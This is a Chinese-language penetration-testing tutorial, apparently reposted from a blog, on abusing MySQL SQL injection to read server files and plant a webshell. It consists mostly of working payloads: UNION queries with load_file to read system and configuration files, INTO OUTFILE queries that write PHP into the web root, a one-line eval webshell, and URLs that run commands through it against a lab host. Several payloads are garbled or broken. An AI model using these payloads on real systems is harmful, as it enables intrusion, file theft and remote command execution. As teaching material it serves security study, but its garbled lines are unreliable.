99网
您的当前位置:首页渗透测试-SQL注入-文件读写及木马植入

渗透测试-SQL注入-文件读写及木马植入

来源:99网


前言

一、读写权限确认

为了实现这个漏洞的利用,我们需要先确认文件的读写权限,然后再进行文件读写(真实情况我们是做不了这一步的,这是为了确定是否有这个漏洞)。

show global variables like '%secure%';
查看mysql全局变量配置,当输入以上命令后,结果
secure_file_priv =--> 任意读写
secure_file_priv = 某个路径   --> 规定路径下读写
secure_file_priv = NULL      --> 不能读写

二、读文件

利用SQL语句读取系统文件,先读取常规文件(明确路径),先爆破路径再爆破路径下文件

-1 union select 1,2,3,load_file('C/windows/service.inf'),5,6,7
-1 union select 1,2,3,
,5,6,7

-1 union select 1,2,3,load_file('D/XamppNew/htdocs/scurity/common.php'),5,6,7
或
http://192.168.88.130/security/read.php?id=-1 union 
select 1,2,3,(select load_file("/opt/lampp/htdocs/security/common.php")),5,6,7

三、写文件

-1 union select 1,2,3,4,5,6,"<?php phpinfo(); ?>" into 
outfile 'D/XamppNew/htdocs/scurity/muma.php'

http://192.168.88.130/security/read.php?id=-1 union 
select 1,2,3,"HelloWorld",5,6,7 into outfile "/opt/lampp/htdocs/security/temp/muma.php"

# 尝试得到列数量,然后注入一次,访问是否注入成功

-1 unionselect1,23456"<?php eval($_POST['a']);?> into
outfile 'D/XamppNew/htdocs/scurity/muma.php'

一句话木马:
<?php @eval($_GET['a']);?>

eval可以将一段字符串当成代码来执行,如果用户可以直接将这段有效代码传入后台,则可以执行任意命令

http://192.168.88.130/security/temp/muma2.php?a=echo date("Y-m-d H:i:s");
http://192.168.88.130/security/temp/muma2.php?a=phpinfo();
http://192.168.88.130/security/temp/muma2.php?a=system('ip addr');

因篇幅问题不能全部显示,请点此查看更多更全内容